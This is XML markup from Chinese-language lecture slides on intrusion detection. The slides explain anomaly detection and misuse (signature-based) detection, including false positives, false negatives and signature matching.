              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                        修正</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>误报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>false positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>false negative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116739" name="Text Box 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4BDCE0-BF2D-4C3E-9441-1C7DAACF86DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="9906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zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin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8F0BD044-4D27-4238-8C03-EC1F66509C00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>异常检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117763" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0710F2F0-A3F8-45D1-8125-80DEEA2E4FCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>如果系统错误地将正常活动定义为入侵，称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>误报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>；如果系统未能检测出真正的入侵行为则称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" i="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>false negative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>特点：异常检测系统的效率取决于用户轮廓的完备性和监控的频率。因为不需要对每种入侵行为进行定义，因此能有效检测未知的入侵。同时系统能针对用户行为的改变进行自我调整和优化，但随着检测模型的逐步精确，异常检测会消耗更多的系统资源。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t> </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1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154BA84F-5E32-4B53-A3AB-84E4C45B3294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020763" y="242888"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Anomaly Detection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244787" name="Text Box 1075">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{036316AD-422A-420D-AD1C-2CFB739C8A37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1708150" y="5857875"/>
            <a:ext cx="4664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zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>存在的问题：误报非常高</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>！</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDF2C91B-5BDE-48F8-849C-04F1FCBE7CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020763" y="1847850"/>
            <a:ext cx="6038850" cy="40100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47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8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10" name="Group 1029">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA6C4268-CF1B-41DF-9DB3-0C68FC98172D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1230313" y="2349500"/>
            <a:ext cx="7302500" cy="4032250"/>
            <a:chOff x="1034" y="1392"/>
            <a:chExt cx="3085" cy="2458"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="119812" name="AutoShape 1047">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D6F818-0314-47B5-8B3F-DF86810247CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1034" y="1570"/>
              <a:ext cx="723" cy="359"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>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1200">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>System Audit</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="119813" name="Text Box 1049">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED86DB12-26DE-4902-9716-A45F68939679}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1373" y="2047"/>
              <a:ext cx="451"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1200">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Metric</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="800">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>s</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="119814" name="Line 1050">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65FA0F99-AA19-4231-9EA3-BA939AC00D08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1373" y="1957"/>
              <a:ext cx="1" cy="3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15" name="Line 1051">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{811AEF71-8EF8-4868-8E51-506F0F64EC11}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1373" y="2317"/>
              <a:ext cx="451"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16" name="Rectangle 1052">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645A6326-A767-4450-BE9D-58FBBD048341}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1757" y="2166"/>
              <a:ext cx="506" cy="359"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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1200">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Pattern Matcher</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="119817" name="Group 1053">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E44596-75A9-4182-AFF5-41790AFE6499}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2263" y="1392"/>
              <a:ext cx="1856" cy="1887"/>
              <a:chOff x="4744" y="912"/>
              <a:chExt cx="2756" cy="3951"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="119819" name="Line 1054">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B475DC94-FA9B-49E7-AF37-BFB7BEDF1B65}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4744" y="2849"/>
                <a:ext cx="7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9820" name="AutoShape 1055">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE723B62-D921-486B-B39A-9B94976E338A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5470" y="2543"/>
                <a:ext cx="435" cy="564"/>
              </a:xfrm>
              <a:prstGeom prst="diamond">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">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19821" name="Line 1056">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351C6452-EEDA-4DB0-86FE-423E07336269}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5679" y="3118"/>
                <a:ext cx="0" cy="112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22" name="Oval 1057">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DE9891B-BCFB-4031-B39F-CEA1AC60FFF9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4986" y="4288"/>
                <a:ext cx="1386" cy="575"/>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1200">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Intrusion</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="800">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="119823" name="Line 1058">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8616AD04-65F1-4F7C-A841-6E37115450BF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="5679" y="1623"/>
                <a:ext cx="0" cy="94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9824" name="Oval 1059">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A86907A-D534-4FAD-81E9-2A5290B666B0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4753" y="912"/>
                <a:ext cx="1877" cy="753"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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en-US" altLang="zh-CN" sz="1200">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Normal Activity</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="800">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="119825" name="Text Box 1060">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B881CA49-0C58-4495-BDF0-1EF16FD89889}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5760" y="1908"/>
                <a:ext cx="1740" cy="5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1200">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>No Signature Match</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="800">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="119826" name="Text Box 1061">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B98F279-F7AC-4F66-97C6-3607DC64B684}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5905" y="3413"/>
                <a:ext cx="1450" cy="5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kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Signature Match</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="800">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="119818" name="Rectangle 1062">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A07EBB4-38B9-43C0-B279-6B5B2598BDE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1824" y="3552"/>
              <a:ext cx="1554"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1800" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>误用检测模型</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Text Box 1028">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB4B017-F796-436A-AC6D-208EA538ED73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="9906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zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>误用检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2"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026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D83F46E-6FC5-4570-AE0D-3C8C567402C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2286000"/>
            <a:ext cx="7696200" cy="4154488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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AutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>前提：所有的入侵行为都有可被检测到的特征 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击特征库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当监测的用户或系统行为与库中的记录相匹配时，系统就认为这种行为是入侵 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
